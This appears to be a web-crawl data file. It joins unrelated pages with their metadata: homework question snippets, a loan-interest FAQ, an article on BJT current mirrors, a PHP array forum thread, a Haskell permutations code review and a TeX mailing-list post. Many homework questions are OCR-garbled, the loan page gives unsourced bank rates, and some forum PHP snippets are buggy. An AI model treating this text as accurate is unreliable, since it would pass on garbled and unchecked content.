hydrogens with a methyl\nHEMI07_OIV In organic chemistry; what should your first \"move\" be after studying phosphine PH;? Select one: a. Substitute a nitrogen for the phosphorous b Create a ring of phosphorus atoms Create a three membered ring; with two carbons and one phosphorous Put an oxygen in place of one of t...\n##### Given f(x)= 3x−1/2x+3,findaformulafor f−1(x).\nGiven f(x)= 3x−1/2x+3,findaformulafor f−1(x)....\n##### Explain how to write an equilibrium constant expression.\nExplain how to write an equilibrium constant expression....\n##### Aluminum reacts with iodine according to the chemical equationbelow:Al + 3/2I2 → AlI3Which of the following reactions is least likely to proceed aswritten? A. Al + 3/2Cl2 → AlCl3 B. Al + 3/2Br2 → AlBr3 C. Al + 3/2F2 → AlF3 D. Al + 3/2At2 → AlAt3 E. Al + 3/2N2 → AlN3\nAluminum reacts with iodine according to the chemical equation below: Al + 3/2I2 → AlI3 Which of the following reactions is least likely to proceed as written? A. Al + 3/2Cl2 → AlCl3 B. Al + 3/2Br2 → AlBr3 C. Al + 3/2F2 → AlF3 D. Al + 3/2At2 → ...\n##### Hot Topics Compare and Contrast the elements and time frame of each component found in each...\nHot Topics Compare and Contrast the elements and time frame of each component found in each of the different types of records listed below. List what they have in common and documentation this is unique to the record type. Inpatient Health (Acute) Records Out Patient Records Long-Term Care Records R...\n##### The phylogenetic tree shown was constructed using a nucleotide distance matrix of Ebola virus isolates from...\nThe phylogenetic tree shown was constructed using a nucleotide distance matrix of Ebola virus isolates from Guinea in March 2014 (“G”), Sierra Leone (“S”), and Mali (“M”) in October/November 2014. Describe what the phylogeny revealed regarding the three Ebola outb...\n##### (1 point) Sketch the region in the first quadrant enclosed by y = 4lx,y = 6x and y x. Decide whether to integrate with respect to x or y Then find the area of the region:Area\n(1 point) Sketch the region in the first quadrant enclosed by y = 4lx,y = 6x and y x. Decide whether to integrate with respect to x or y Then find the area of the region: Area...\n##### If sin 3x = cos x, where x is between 0 to 90degree inclusive, what is the value of x?\nIf sin 3x = cos x, where x is between 0 to 90degree inclusive, what is the value of x?...\n##### Use the limit of the difference quotient to determine a formula for $f^{prime}(x) .$ In 10-12, $alpha, eta, gamma in mathbb{R}$ are nonzero numbers.$f(x)=x^{3}+1$\nUse the limit of the difference quotient to determine a formula for $f^{prime}(x) .$ In #10-12, $alpha, \beta, gamma in mathbb{R}$ are nonzero numbers. $f(x)=x^{3}+1$...\n##### Hpomls 0/6 Submissions UsedMy NotesEvaluate the integral. (Use C for the constant of integration. Remember to use absolute values where appropriate ) (12x S+4 )\nHpomls 0/6 Submissions Used My Notes Evaluate the integral. (Use C for the constant of integration. Remember to use absolute values where appropriate ) (12x S+4 )...\n##### 3. If W span(W1, Wz,Wk ) , prove that ifv Wi0 for all i = 1,2, ,k then v € WL _\n3. If W span(W1, Wz, Wk ) , prove that ifv Wi 0 for all i = 1,2, ,k then v € WL _...\n##### 5) [3 marcs] Find tc cartesian forms of te fourth roots of 8iv5 _ & Simplify % txr 15 possibk , DO rounding sllowed\n5) [3 marcs] Find tc cartesian forms of te fourth roots of 8iv5 _ & Simplify % txr 15 possibk , DO rounding sllowed...\n##### A fence is to be constructed to enclose a rectangular area of 20,000 m? A previously con- structed wall is to be used for one side. Sketch the length of fence to be built as a function of the side of the fence parallel to the wall. See Fig: 24.50.20,000 m 2WallFig: 24.50\nA fence is to be constructed to enclose a rectangular area of 20,000 m? A previously con- structed wall is to be used for one side. Sketch the length of fence to be built as a function of the side of the fence parallel to the wall. See Fig: 24.50. 20,000 m 2 Wall Fig: 24.50...\n##### (4 points) beam design SSCL CDDCMD01 2013 Michaal Swanbom Dimensions and Loads 2.5 m 2.1 m...\n(4 points) beam design SSCL CDDCMD01 2013 Michaal Swanbom Dimensions and Loads 2.5 m 2.1 m 2.8 m 1.7 m17.8 kN*m W1 W3 Fi 8.4 kN/m 19.3 kN/m 26.8 kN/m 7.5 kN 11.6 kN Problem Statement: A beam is loaded and supported as shown. Assuming the beam is composed of Structural Steel and must maintain a facto...\n##### A $12.0-mathrm{g}$ bullet is fired horizontally into a 100 -g wooden block that is initially at rest on a frictionless horizontal surface and connected to a spring having spring constant $150 mathrm{~N} / mathrm{m}$. The bullet becomes embedded in the block. If the bullet-block system compresses the spring by a maximum of $80.0 mathrm{~cm}$, what was the speed of the bullet at impact with the block?\nA $12.0-mathrm{g}$ bullet is fired horizontally into a 100 -g wooden block that is initially at rest on a frictionless horizontal surface and connected to a spring having spring constant $150 mathrm{~N} / mathrm{m}$. The bullet becomes embedded in the block. If the bullet-block system compresses the...\n##### E) none of the above un equilibrium occurs les intersect. 26. In the Keynesian model, short-run...\nE) none of the above un equilibrium occurs les intersect. 26. In the Keynesian model, short-run egun A) where the IS and LA curves intersect. Where the IS curve. Meurve. and FE lines inters C) where the IS curve intersects the FB fine. D) where the LM curve intersects the Fence he money supply will ...\n##### Point) Cakculate the circulation; JcF dv , in two ways, directly and using Stokes' Theorem: The vector fiel F 3yi 3cj and C is the boundary of S,the part of the surface tne Ti-plane , onented upwary? aboveNote that € is circle the cy-plane_ Find 7(t) that parameterizes this curve. F(t)with<t<(Note [hal answers muSt be provided Tor all tnree 0r Inese answer Dianks be adle detemine correctness 0f Ine parameterzation ) With tnis parameterzation, the circulation integral JcF dt; were an\npoint) Cakculate the circulation; JcF dv , in two ways, directly and using Stokes' Theorem: The vector fiel F 3yi 3cj and C is the boundary of S,the part of the surface tne Ti-plane , onented upwar y? above Note that € is circle the cy-plane_ Find 7(t) that parameterizes this curve. F(t) ...\n##### Dexter Company appropriately uses the asset-liability method to record deferred income taxes. Dexter reports depreciation expense...\nDexter Company appropriately uses the asset-liability method to record deferred income taxes. Dexter reports depreciation expense for certain machinery purchased this year using the modified accelerated cost recovery system (MACRS) for income tax purposes and the straight-line basis for financial re...\n##### 3. Draw an energy level diagram for HCI showing for the ground vibrational and lowest rotational energy levels: V = 0,J=0,1,2,3 and the first excited vibrational state with the lowest rotational levels: v =1,J=0,1,2,3. On your diagram, show the P(1) and R(2) transitions_ (Don't worry about drawing the diagram to scale tthe purpose of this exercise is to make sure YOu understand what gives rise to the infrared spectrum of HCL)\n3. Draw an energy level diagram for HCI showing for the ground vibrational and lowest rotational energy levels: V = 0,J=0,1,2,3 and the first excited vibrational state with the lowest rotational levels: v =1,J=0,1,2,3. On your diagram, show the P(1) and R(2) transitions_ (Don't worry about draw...\n##### Do you count all zeros behind a decimal place as significant figures?\nDo you count all zeros behind a decimal place as significant figures?..." ]
[ null, "https://cdn.numerade.com/ask_images/c679e15053a44edba475927daaae9cf5.jpg ", null, "https://cdn.numerade.com/previews/6b45ee2b-8aa2-4c65-80b9-d2598ac52c8a_large.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.84210634,"math_prob":0.9424579,"size":14616,"snap":"2023-40-2023-50","text_gpt3_token_len":4127,"char_repetition_ratio":0.1003285,"word_repetition_ratio":0.51215684,"special_character_ratio":0.27545157,"punctuation_ratio":0.14290251,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9715002,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-04T03:47:41Z\",\"WARC-Record-ID\":\"<urn:uuid:80414df4-84b8-4d6e-82eb-ed1bc38fc894>\",\"Content-Length\":\"91161\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b0aa4da8-fa93-4159-8daa-d8918a99bd77>\",\"WARC-Concurrent-To\":\"<urn:uuid:8fe77cb8-501b-4afe-8908-27dcabf30cdb>\",\"WARC-IP-Address\":\"104.21.12.185\",\"WARC-Target-URI\":\"https://solvedlib.com/n/aton-thtoda-9-ji-i-idala-belo-quot-i-hiceralil-1-88-0-1,20810278\",\"WARC-Payload-Digest\":\"sha1:ZHIAYOBILBDK3FIIP2ZFRKZSRZRKEI3H\",\"WARC-Block-Digest\":\"sha1:5GHW3CE4PKCXJFZD7PU2TGJCEINFIJRH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233511351.18_warc_CC-MAIN-20231004020329-20231004050329-00269.warc.gz\"}"}
https://www.reviewforloans.com/post/what-is-interest-rate-in-personal-finance-02ebd632/
[ "# What is interest rate in personal finance?\n\nInterest rates are growth rates – it is a percentage that is used to calculate how much a loan or investment grows over time. … The interest rate is how much extra needs to be paid back in exchange for the loan. Interest rates are also used in savings accounts, where you might earn interest on your savings.\n\n>> Click to read more <<\n\n## Similarly one may ask, what is SBI interest rate?\n\nSBI currently offers 6.25% interest rate to the general public while senior citizens can enjoy 6.75% interest on FDs below Rs.2 crore for 1-year tenor to less than 2-years tenor. For FDs maturing between 46 days and 179 days, the FD rates for the general public and senior citizens are 6% respectively.\n\nAccordingly, who sets the interest rate on a private loan? 1. Your credit score. Lenders use your credit score and history to set private student loan interest rates. Typically, the better your credit, the more likely a lender is willing to finance a loan at a lower rate.\n\n## Also question is, how do you calculate monthly interest rate?\n\nTo calculate a monthly interest rate, divide the annual rate by 12 to reflect the 12 months in the year. You’ll need to convert from percentage to decimal format to complete these steps. Example: Assume you have an APY or APR of 10%.\n\n## Is a 15% interest rate high?\n\nFrom 2018 through 2020, that number fluctuated between 13.63% and 15.13%, so it’s a good bet anything below 15% is average or better. Credit cards that were assessed interest had higher average APRs—15.91% was the average in the first quarter of 2021 and got as high as 17.14% between 2018 and 2020.\n\n## How interest rate is determined?\n\nInterest rates are determined, in large part, by central banks who actively commit to maintaining a target interest rate. They do so by intervening directly in the open market through open market operations (OMO), buying or selling Treasury securities to influence short term rates.\n\n## What is an interest rate example?\n\nInterest rates on consumer loans are typically quoted as the annual percentage rate (APR). This is the rate of return that lenders demand for the ability to borrow their money. For example, the interest rate on credit cards is quoted as an APR. In our example above, 4% is the APR for the mortgage or borrower.\n\n## What is illegal interest rate?\n\nUsury laws in different states\n\nEach state has a different approach to usury law. … For example, in California the maximum interest rate is set at 12 percent, however, the law states that banks and similar institutions are exempt. This is also the case in Florida, Minnesota, and New Jersey, among others.\n\n## How much interest do finance companies charge?\n\nThat interest/finance charge typically is somewhere between 15% and 20%, depending on the lender, but could be higher. State laws regulate the maximum interest a payday lender may charge. The amount of interest paid is calculated by multiplying the amount borrowed by the interest charge.\n\n## What is a legal interest rate?\n\nThe legal rate of interest is the highest rate of interest that can be legally charged on any type of debt. Certain types of debt may carry a higher legal rate than another. The limits are set to prevent lenders from charging borrowers excessive interest rates.\n\n## Which bank has highest rate of interest?\n\nFixed Deposit Interest Rates by Different Banks\n\nBank Tenure Interest Rates for General Citizens (per annum)\nICICI 7 days to 10 years 2.50% to 5.50%\nPunjab National Bank 7 days to 10 years 2.90% to 5.25%\nHDFC Bank 7 days to 10 years 2.50% to 5.50%\nAxis Bank 7 days to 10 years 2.50% to 5.75%\n\n## Is a 2.8 interest rate good?\n\nAnything at or below 3% is an excellent mortgage rate. … For example, if you get a \\$250,000 mortgage with a fixed 2.8% interest rate on a 30-year term, you could be paying around \\$1,027 per month and \\$119,805 interest over the life of your loan.\n\n## What are interest rates today?\n\nProduct Interest Rate APR\nConforming and Government Loans\n30-Year Fixed Rate 3.25% 3.36%\n30-Year Fixed-Rate VA 2.75% 2.991%\n15-Year Fixed Rate 2.5% 2.714%\n\n## What are the 2 different types of interest rates?\n\nWhen borrowing money with a credit card, loan, or mortgage, there are two interest rate types: Fixed Rate Interest and Variable Rate Interest.\n\n## How do you calculate interest in personal finance?\n\nThe formula for calculating simple interest is I = PRT where I = simple interest, P = the principal amount invested or borrowed, R = the interest rate expressed as a decimal, and T = the time involved." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9497019,"math_prob":0.91370845,"size":4179,"snap":"2023-40-2023-50","text_gpt3_token_len":1007,"char_repetition_ratio":0.15976048,"word_repetition_ratio":0.02086231,"special_character_ratio":0.2534099,"punctuation_ratio":0.115429915,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95792556,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-07T07:36:08Z\",\"WARC-Record-ID\":\"<urn:uuid:5c73c4ec-752c-4fa4-8222-2a1ffee60b55>\",\"Content-Length\":\"149553\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d7ba8926-2281-4e89-a203-2c8ee35facfe>\",\"WARC-Concurrent-To\":\"<urn:uuid:83f442c1-727e-4be2-872e-a7fa0cbc6e12>\",\"WARC-IP-Address\":\"104.21.42.141\",\"WARC-Target-URI\":\"https://www.reviewforloans.com/post/what-is-interest-rate-in-personal-finance-02ebd632/\",\"WARC-Payload-Digest\":\"sha1:YPPWHAEDUO6D6KZ2WS56K7G5Y3WKVCMO\",\"WARC-Block-Digest\":\"sha1:YIEGB34DMLE2POKQKCIZOCHJGDIW6FUG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100650.21_warc_CC-MAIN-20231207054219-20231207084219-00743.warc.gz\"}"}
https://blog.mbedded.ninja/electronics/components/current-mirrors/
[ "CURRENT MIRRORS\n\n# Current Mirrors\n\nArticle by:\n Date Published: August 6, 2022 Last Modified: August 6, 2022\n\n## Overview\n\nA current mirror is a circuit designed to “copy” (mirror) the current through one part of a circuit into another. The output current is kept relatively constant even though the load resistance may be dynamically changing.\n\nCurrent mirrors are used extensively inside analogue ICs such as operation amplifiers (op-amps).\n\n## Basic BJT Current Mirror\n\nYou can make a basic current mirror from nothing but two bi-polar transistors (BJTs). Shown below is a basic BJT current mirror made from two NPN BJTs:", null, "A basic BJT current mirror made from two NPN bipolar junction transistors.\n\nHow Does It Work?\n\nBoth $$Q_1$$ and $$Q_2$$ should be identical transistors at the same temperature. The clever trick in this circuit is the base of $$Q_1$$ which is connected to its collector. The BJT will adjust it’s base-emitter voltage $$V_{BE}$$ to pass the input current. This $$V_{BE}$$ is then applied to the base of $$Q_2$$. Because it is the same type of transistor as $$Q_2$$, this $$V_{BE}$$ should cause the same base current, and the same $$\\beta$$ will produce the same collector current through $$Q_2$$.", null, "$$R_{IN}$$ is not strictly needed (it is not part of the current mirror), but added here so you can visualize connecting a voltage source to the input.\n\nBelow is a circuit simulation of this basic BJT current mirror. 4.37mA is provided to the input leg of the current mirror, and the current mirror sinks 4.28mA from the output. Close enough for many applications!\n\nThe main current error in the basic BJT current mirror circuit is because the base of Q1 and Q2 “suck” away some of the current you are tying to measure through the collector of Q1. If Q1/Q2 had current gains of 100, then $$2*\\frac{1}{101} = \\frac{2}{101}$$ of the current will be diverted into the bases rather than through the collector, and hence not mirrored on the output.\n\n## Buffered Feedback Current Mirror\n\nAs mentioned above, one of the main problems with the basic current mirror is that the bases of Q1 and Q2 “suck” away some of the input current. To improve on this, we can add another NPN BJT on the input side to “buffer” the base of Q1/Q2. Now only $$\\frac{1}{101} * \\frac{2}{101} = \\frac{3}{10201}$$ of the current is diverted away. This is called the buffered feedback current mirror, or emitter follower augmented mirror1.", null, "Schematic of a buffered BJT current mirror.\n\nBelow is a simulation of the buffered feedback current mirror. Notice now the the output current is only $$0.03\\%$$ different from the input! This is a great improvement on the $$2\\%$$ error of the basic BJT current mirror!\n\n1. Analog Devices (2021, Sep 17). Chapter 11: The Current Mirror. Retrieved 2022-08-06, from https://wiki.analog.com/university/courses/electronics/text/chapter-11↩︎" ]
[ null, "https://blog.mbedded.ninja/electronics/components/current-mirrors/basic-bjt-current-mirror.png", null, "https://blog.mbedded.ninja/assets/icons/note.svg", null, "https://blog.mbedded.ninja/electronics/components/current-mirrors/buffered-bjt-current-mirror.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8499218,"math_prob":0.9805363,"size":2964,"snap":"2022-40-2023-06","text_gpt3_token_len":760,"char_repetition_ratio":0.16216215,"word_repetition_ratio":0.021186441,"special_character_ratio":0.25506073,"punctuation_ratio":0.09090909,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9971394,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,1,null,null,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-30T09:34:26Z\",\"WARC-Record-ID\":\"<urn:uuid:291388e6-d04d-46cf-951d-1d73a6dc05b9>\",\"Content-Length\":\"266306\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f3b4d051-8e9d-4458-ad52-5b565c142a71>\",\"WARC-Concurrent-To\":\"<urn:uuid:11a29252-9629-41d3-a70f-4ef07b459e48>\",\"WARC-IP-Address\":\"34.148.97.127\",\"WARC-Target-URI\":\"https://blog.mbedded.ninja/electronics/components/current-mirrors/\",\"WARC-Payload-Digest\":\"sha1:MDMXRCAISE6ITPV6H6FWYAYKBMG4DBL4\",\"WARC-Block-Digest\":\"sha1:TDQGY4GOPHUFJQCCBJABWZVXHOU2MGET\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030335448.34_warc_CC-MAIN-20220930082656-20220930112656-00272.warc.gz\"}"}
http://capturesoul.com/archives/2582
[ "# php的数组怎么定义长度啊\n\npython还有javascript都支持,php为什么不支持啊\n\ncount(数组)\n\ncount(数组)\n\nout类型 是什么类型?\n\nout类型 是什么类型?\n\nphp 不需要指定数组长度, 也无法指定长度, 你只有知道输出类型是数组就可以了。\n\nphp 数组拿来就用,数组可大可小,没有边界限制,无需定长. 这和c是有很大区别的.\n\nphp 数组拿来就用,数组可大可小,没有边界限制,无需定长. 这和c是有很大区别的.\n\nfunction f(a) {\nfor (var i = 0; i < a.length; i++) { a[i] = i } } a = new array(3) f(a)\n\nfunction f(\\$a) {\n\\$a = [];\nfor (\\$i = 0; \\$i < \\$a; \\$i++) { \\$array[\\$i] = \\$i; } return \\$array; } \\$a = f(3);\n\nfunction f(\\$a) {\n\\$array = [];\nfor (\\$i = 0; \\$i < \\$a; \\$i++) { \\$array[\\$i] = \\$i; } return \\$array; } \\$a = f(3); 上面手滑\n\nphp 只是借用了 array 这个名称而已\n\n\\$ar = array_fill(0, 10, 0);\n\nfunction f(\\$a) {\n\\$array = [];\nfor (\\$i = 0; \\$i < \\$a; \\$i++) { \\$array[\\$i] = \\$i; } return \\$array; } \\$a = f(3); 上面手滑\n\nphp 只是借用了 array 这个名称而已\n\n\\$ar = array_fill(0, 10, 0);\n\nc/c++ 是编译运行的,数组需要在编译时就分配内存空间\n\nfunction f(\\$a) {\n\\$array = [];\nfor (\\$i = 0; \\$i < \\$a; \\$i++) { \\$array[\\$i] = \\$i; } return \\$array; } \\$a = f(3); 上面手滑\n\nc/c++ 是编译运行的,数组需要在编译时就分配内存空间\n\narray_fill 也不需要,直接初始化空数组就可以了\n\narray_fill 也不需要,直接初始化空数组就可以了\n\narray_fill 也不需要,直接初始化空数组就可以了\n\nfunction f(&\\$array)\n{\nfor (\\$i = 0; \\$i < count(\\$array); \\$i++) { \\$array[\\$i] = \\$i; } } \\$a = array_fill(0, 3, 0); f(\\$a); 这样你满意了? 呵呵.. 结不结帖你随意吧. 勿回. 我也不进来了.\n\nfunction f(&\\$array)\n{\nfor (\\$i = 0; \\$i < count(\\$array); \\$i++) { \\$array[\\$i] = \\$i; } } \\$a = array_fill(0, 3, 0); f(\\$a); 这样你满意了? 呵呵.. 结不结帖你随意吧. 勿回. 我也不进来了.\n\njavascript的new array(10)、python的[int] * 10\n\njavascript的new array(10)、python的[int] * 10\n\nphp不需要先定义长度。\n\nphp不需要先定义长度。\n\n666666663六\n\n\\$a = array();\nfoo(\\$a);\nprint_r(\\$a);\nfunction foo(&\\$x) {\nfor(\\$i=0; \\$i\n\nPosted in 未分类" ]
[ null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.89682084,"math_prob":0.9990963,"size":3614,"snap":"2020-10-2020-16","text_gpt3_token_len":2612,"char_repetition_ratio":0.112465374,"word_repetition_ratio":0.53203344,"special_character_ratio":0.2731046,"punctuation_ratio":0.17253521,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9974711,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-24T04:34:38Z\",\"WARC-Record-ID\":\"<urn:uuid:76a50954-5798-427f-b5d2-5619361d091b>\",\"Content-Length\":\"28274\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:229f5173-9929-423c-8cdc-fd14f88b6721>\",\"WARC-Concurrent-To\":\"<urn:uuid:24c45ee4-3909-4bda-97dc-d6f55268d9dd>\",\"WARC-IP-Address\":\"47.52.240.129\",\"WARC-Target-URI\":\"http://capturesoul.com/archives/2582\",\"WARC-Payload-Digest\":\"sha1:QDMJQCEJ6ZKRMD2AYJNHL7QS4PPUW3UX\",\"WARC-Block-Digest\":\"sha1:HBQ22HMUT3MCFH2BACNRQ2PIOBMRTLLO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875145897.19_warc_CC-MAIN-20200224040929-20200224070929-00439.warc.gz\"}"}
https://codereview.stackexchange.com/questions/134797/finding-permutations-in-haskell
[ "I wrote a function to find all the possible permutations of a list in Haskell. I know it can definitely be optimized, but I'm not sure how. I'm pretty sure foldl or foldl' can be used, but I'm not sure how. It gets kinda slow when the size of the argument for perms is more than 6 items, but I don't know if this is avoidable.\n\nWhat could I do to improve this function, mainly to simply it, improve it stylistically, and boost performance?\n\nperms :: [a] -> [[a]]\nperms = perms' 0\nwhere\nperms' _ [x, y] = [[x, y], [y, x]]\nperms' c xs\n| c == length xs = []\n| otherwise = (sub_perm xs) ++ (perms' (c + 1) (shift xs))\nsub_perm (x:xs) = fmap (\\a -> x:a) \\$ perms xs\nshift xs = (last xs):(init xs)\n\n\nIt's better to base recursion at the length 1 or 0. It's usually trivial and reduces the chance of making an error. In your case, the code doesn't work for lists of length 1, and this can be easily fixed by setting the base case to perms' _ [x] = [[x]].\n\nThe costly operations in your code are repeated traversals of the input list. In particular, length xs is called every time, and as lists in Haskell are lazy linked lists, it costs you O(n). You could pass the length of the list as another argument instead.\n\nSimilarly last and init are O(n). You could use splitAt to traverse the list just once, or even better, rotate the other way around, something like shift (y:ys) = ys ++ [y] where you need to traverse the list just once (for ++) and pattern matching is also somewhat safer than using partial functions such as init/head/last/..., especially if you cover all cases and use -fwarn-incomplete-patterns. You might also consider using Seq which has O(1) costs for manipulating its ends and O(log n) splitting/merging sequences in the middle, but has higher constant factor.\n\nAnother source of inefficiencies could be the ++ in the otherwise branch, as ++ needs to traverse the whole left argument. You might again try out Seq, or constructing the result using difference lists, which eliminates this problem.\n\nYou could solve several of these problems by introducing a helper function that'd return all possible splits of an input list, something like\n\nsplits :: [a] -> [(a, [a])]\n\n\nfor example splits [1,2,3] = [(1, [2, 3]), (2, [1, 3]), (3, [1, 2])]. And then recursively process the second part, prepending the picked element to all sub-results.\n\nIt's good that you provided the type of the top-level function.\n\nAlso (\\a -> x : a) can be abbreviated to (x :) using η-reduction.\n\nBelow is code based on the above ideas, with some more optimizations (to improve sub-list sharing), left as an exercise to analyze:\n\n perms :: [a] -> [[a]] perms = go [] where go rs [] = [rs] go rs xs = concatMap (\\(y, ys) -> go (y : rs) ys) (splits xs) splits :: [a] -> [(a, [a])] splits = go [] where go ys [] = [] go ys (x : xs) = (x, ys ++ xs) : go (x : ys) xs \n\nYou might be interested in the permutations function from Data.List:\n\n-- | The 'permutations' function returns the list of all permutations of the argument.\n--\n-- > permutations \"abc\" == [\"abc\",\"bac\",\"cba\",\"bca\",\"cab\",\"acb\"]\npermutations :: [a] -> [[a]]\npermutations xs0 = xs0 : perms xs0 []\nwhere\nperms [] _ = []\nperms (t:ts) is = foldr interleave (perms ts (t:is)) (permutations is)\nwhere interleave xs r = let (_,zs) = interleave' id xs r in zs\ninterleave' _ [] r = (ts, r)\ninterleave' f (y:ys) r = let (us,zs) = interleave' (f . (y:)) ys r\nin (y:us, f (t:y:us) : zs)\n\n• That's not a review of the author's code. – Zeta Jul 15 '16 at 6:12" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9162191,"math_prob":0.98703724,"size":2150,"snap":"2021-31-2021-39","text_gpt3_token_len":559,"char_repetition_ratio":0.089002796,"word_repetition_ratio":0.020100502,"special_character_ratio":0.28790697,"punctuation_ratio":0.14318182,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9968504,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-29T04:47:20Z\",\"WARC-Record-ID\":\"<urn:uuid:40078d84-547f-4ff7-818b-501f911fde46>\",\"Content-Length\":\"176508\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2b5967c7-e4b1-4aec-8834-41d418919e0e>\",\"WARC-Concurrent-To\":\"<urn:uuid:5d4350f3-59d7-4246-964e-acf96e204814>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://codereview.stackexchange.com/questions/134797/finding-permutations-in-haskell\",\"WARC-Payload-Digest\":\"sha1:V2J57SQYM6HDDS3YDSMBZPNPY5BBFD4Z\",\"WARC-Block-Digest\":\"sha1:UFQQFL2V2NDKB4AA52DJZZHXFS2US6YX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046153816.3_warc_CC-MAIN-20210729043158-20210729073158-00056.warc.gz\"}"}
https://tug.org/pipermail/macostex-archives/2012-November/050231.html
[ "# [OS X TeX] ntheorem and the equation environment\n\nDon Green Dragon fergdc at Shaw.ca\nTue Nov 6 05:15:19 CET 2012\n\nHello Themis,\n\nApology for appearing to ignore your reply. I've been away for some time and have now returned to working with TeXShop. I'll study your reply and see how things work out. Thanks.\n\nDon Green Dragon\nfergdc at Shaw.ca\n\nOn 16Jun2012, at 5:05 AM, Themis Matsoukas wrote:\n\n>\n> On Jun 15, 2012, at 11:02 PM, Don Green Dragon wrote:\n>\n>> Hi All,\n>>\n>> For some months now, I've been using the ntheorem package in my basic template.\n>\n> [...]\n>\n>> Everything has been working well until I recently noticed that source code of the form\n>>\n>> \\begin{equation} . . . \\end{equation}\n>>\n>> does not work. Even something as simple as\n>\n> The following worked for me:\n>\n> \\documentclass [11pt, fleqn, leqno] {book}\n> \\usepackage[amsthm, thmmarks, framed, thref]{ntheorem}\n> \\usepackage{framed}\n>\n> \\theoremstyle{marginbreak} \\theoremheaderfont{\\normalfont\\bfseries}\\theorembodyfont{\\slshape} \\theoremsymbol{\\ensuremath{\\diamondsuit}}\n> \\theoremseparator{:}\n> \\newtheorem{Theorem}{Theorem}\n>\n> \\begin{document}\n> Everything has been working well until I recently noticed that source code of the form\n>\n> \\begin{Theorem}\n> My theorem proves that\n> \\begin{equation}\n> \ta + b + c = d\n> \\end{equation}\n> \\end{Theorem}\n>\n> \\end{document}\n>\n>\n> Themis\n> tmatsoukas at me.com\n>\n>\n> <PastedGraphic-1.pdf>" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8254842,"math_prob":0.75305897,"size":1459,"snap":"2019-13-2019-22","text_gpt3_token_len":441,"char_repetition_ratio":0.118900344,"word_repetition_ratio":0.11453745,"special_character_ratio":0.294037,"punctuation_ratio":0.14919356,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97307587,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-19T15:57:24Z\",\"WARC-Record-ID\":\"<urn:uuid:5513e244-3ab2-4ab7-97d7-e230c794dc64>\",\"Content-Length\":\"4738\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:19f033cd-54c7-4a89-8066-fa363890b16d>\",\"WARC-Concurrent-To\":\"<urn:uuid:f281f94e-3197-437d-aaf8-d67b4f121d7c>\",\"WARC-IP-Address\":\"91.121.174.77\",\"WARC-Target-URI\":\"https://tug.org/pipermail/macostex-archives/2012-November/050231.html\",\"WARC-Payload-Digest\":\"sha1:6TQFTGUJD4DPHS2KL7JGZD36T36KRC6G\",\"WARC-Block-Digest\":\"sha1:VUMZISYOP7AU7XXVW74MJAWF6WRE4PGH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912201996.61_warc_CC-MAIN-20190319143502-20190319165502-00329.warc.gz\"}"}
https://percent-of.com/calculate/what-is-64-of-9614/
